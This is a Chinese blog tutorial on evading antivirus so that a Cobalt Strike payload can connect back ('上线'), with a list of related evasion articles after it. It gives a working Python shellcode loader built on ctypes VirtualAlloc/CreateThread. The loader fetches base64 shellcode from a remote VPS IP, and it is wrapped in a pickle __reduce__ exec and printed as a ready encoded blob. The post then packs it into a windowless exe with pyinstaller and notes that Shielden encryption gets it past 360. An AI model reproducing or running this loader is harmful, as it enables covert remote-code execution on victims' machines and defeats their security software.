1、首先cs生成一个64位的Python Payload

2、截取其中的Payload,并进行base64编码。

3、把这一串子base64放到VPS上。并开启web服务。

 python3 -m http.server 7777

4、使用以下脚本。将Python Payload进行反序列化。

import pickleimport base64shellcode = """
import ctypes,urllib.request,codecs,base64shellcode = urllib.request.urlopen('http://47.101.72.112:7777/py.txt').read()
shellcode = base64.b64decode(shellcode)
shellcode =codecs.escape_decode(shellcode)[0]
shellcode = bytearray(shellcode)
# 设置VirtualAlloc返回类型为ctypes.c_uint64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
# 申请内存
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))# 放入shellcode
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode))
)
# 创建一个线程从shellcode防止位置首地址开始执行
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))
)
# 等待上面创建的线程运行完
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))"""class A(object):def __reduce__(self):return (exec, (shellcode,))ret = pickle.dumps(A())
ret_base64 = base64.b64encode(ret)
print(ret_base64)
#ret_decode = base64.b64decode(ret_base64)

5、把输出的字节流放到shellcode里,运行执行shellcode,上线。

import base64,pickle,ctypes,urllib.request
shellcode =b'gANjYnVpbHRpbnMKZXhlYwpxAFg1BAAACmltcG9ydCBjdHlwZXMsdXJsbGliLnJlcXVlc3QsY29kZWNzLGJhc2U2NAoKc2hlbGxjb2RlID0gdXJsbGliLnJlcXVlc3QudXJsb3BlbignaHR0cDovLzE3Mi4yMC4xMC4yOjgwODAvMTExMS50eHQnKS5yZWFkKCkKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShzaGVsbGNvZGUpCnNoZWxsY29kZSA9Y29kZWNzLmVzY2FwZV9kZWNvZGUoc2hlbGxjb2RlKVswXQpzaGVsbGNvZGUgPSBieXRlYXJyYXkoc2hlbGxjb2RlKQojIOiuvue9rlZpcnR1YWxBbGxvY+i/lOWbnuexu+Wei+S4umN0eXBlcy5jX3VpbnQ2NApjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0CiMg55Sz6K+35YaF5a2YCnB0ciA9IGN0eXBlcy53aW5kbGwua2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSwgY3R5cGVzLmNfaW50KDB4MzAwMCksIGN0eXBlcy5jX2ludCgweDQwKSkKCiMg5pS+5YWlc2hlbGxjb2RlCmJ1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KAogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgYnVmLCAKICAgIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSkKKQojIOWIm+W7uuS4gOS4que6v+eoi+S7jnNoZWxsY29kZemYsuatouS9jee9rummluWcsOWdgOW8gOWni+aJp+ihjApoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMuY19pbnQoMCksIAogICAgY3R5cGVzLmNfdWludDY0KHB0ciksIAogICAgY3R5cGVzLmNfaW50KDApLCAKICAgIGN0eXBlcy5jX2ludCgwKSwgCiAgICBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpCikKIyDnrYnlvoXkuIrpnaLliJvlu7rnmoTnur/nqIvov5DooYzlrowKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkpcQGFcQJScQMu'
pickle.loads(base64.b64decode(shellcode))

6、打包成exe。

pyinstaller -F exp.py --noconsole

在当前目录下的dist目录下生成好exe。双击上线。

7、实际用了一下发现Defender和火绒没问题,360过不去。

可以使用shielden加密代码进行绕过。

Referer:

https://www.sec-in.cn/article/733

浅谈CS免杀和使用

(记录向)Python反序列化免杀上线CS(并使用Shielden加密绕过360)相关推荐

  1. 使用powershell免杀上线CS的新方式---利用图片

    文章目录 利用工具 模拟上线 总结 参考文章 利用工具 Invoke-PSImage 任意一张图片 模拟上线 1.使用cs生成一个powershell的payload. 2.执行工具脚本并保存生成的上 ...

  2. Python shellcode免杀

    浅谈Python shellcode免杀 一.前言 在安全厂商日趋成熟的背景下,编写免杀马的难度和成本日益增长.很多师傅好用的开源免杀项目公布出来的同时几乎也就意味它的失效,对于一些和我一样对系统底 ...

  3. Metasploit+python生成免杀exe过360杀毒

    Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reve ...

  4. python序列化和反序列化_python反序列化免杀

    在日常的渗透行动当中,当我们对目标进行内网横向渗透时很不幸的是内网一般往往都会部署防火墙.流量监控等设备,杀软更是成为了服务器的标配,所以如何进行免杀绕过杀毒软件的限制让主机上线成了我们首要解决的问题 ...

  5. shellcode免杀;CS上线;获取微信聊天记录

    获取被控端微信聊天记录参考: https://mp.weixin.qq.com/s/4DbXOS5jDjJzM2PN0Mp2JA 微信取证工具(随时更新,随时关注): https://github.c ...

  6. 新版掩日免杀——搭配CS使用测试

    阅读前请注意: 本人发布的此篇技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站,服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵 ...

  7. 2017php免杀大马,cs 免杀 payload 绕过 360 全家桶

    文章来源于叮咚实验室 作者:吃个橘子 实验环境: Win10 物理机(cs 服务端)Win7 虚拟机(360 安全卫士+360 杀毒全家桶 最新版) 准备材料:vs2017 ,cs 我们先用CS生成普 ...

  8. 红队作业 | Python实现免杀远控

    文章来源|MS08067 红队培训班 第4期 本文作者:学员A(红队培训班4期学员) 按老师要求尝试完成布置的作业如下: 要想实现简易远控,说的详细点就是反弹shell,首先要解决三个问题: 1.与服 ...

  9. Powershell 过火绒免杀上线

    payload生成 原生payload生成后被无情秒杀 powershell免杀制作 打开powershell命令行,将payload编码 1.新建一个变量h,用来接收之后编码的payload $h= ...

最新文章

  1. springMVC 处理json 及 HttpMessageConverter 接口
  2. Java生成CSV文件
  3. 优化委托的 DynamicInvoke
  4. linux vim debugger,Vim 调试:termdebug 入门
  5. resnet模型的图像分类结构图_ResNet - 2015年 ILSVRC 的赢家(图像分类,定位及检测)...
  6. 中文 CentOS 攻略
  7. 2019年9月全国程序员工资统计,看看你拖后腿了吗?
  8. 555定时器回差电压计算公式_555定时器及其应用
  9. XenApp备份方法
  10. 百度AI接入api使用流程
  11. 5G标准必要专利最新全球排名
  12. java replica set_Kubernetes对象之ReplicaSet
  13. 世界史上最成功的12大王朝
  14. 【一周头条盘点】中国软件网(2018.10.29~2018.11.2)
  15. 对生产订单月结的理解
  16. openstack--T版—nava计算服务
  17. 右键菜单管理 - Win系统
  18. Unity调用摄像头并截图
  19. 你必须要知道的 人工智能相关基础知识
  20. 从低水池抽水到高位水池的无线水位及水泵联控装置

热门文章

  1. Istio的架构概述
  2. 全国计算机技术与软件专业技术资格(水平)考试报名时间 上半年2023年3月13日开始,下半年2023年8月14日开始
  3. matlab数值积分变步长,关于MATLAB数值积分及算例.ppt
  4. 2019 新版windows10修改切换输入法快捷键方式
  5. 女科学家 编织计算机,来自女计算机科学家的光彩——MSTCers对话图灵奖获得者Barbara Liskov...
  6. logisim 快速加法器设计实验报告_数字逻辑第一次实验报告-模板n.docx
  7. win7 右键计算机无反映,win7系统鼠标右键没有反应怎么办?
  8. php 个人账户转账,alipay.fund.trans.uni.transfer(单笔转账到支付宝账户接口PHP示例)
  9. 最小操作数,木块砌墙问题
  10. python批量裁剪图片尺寸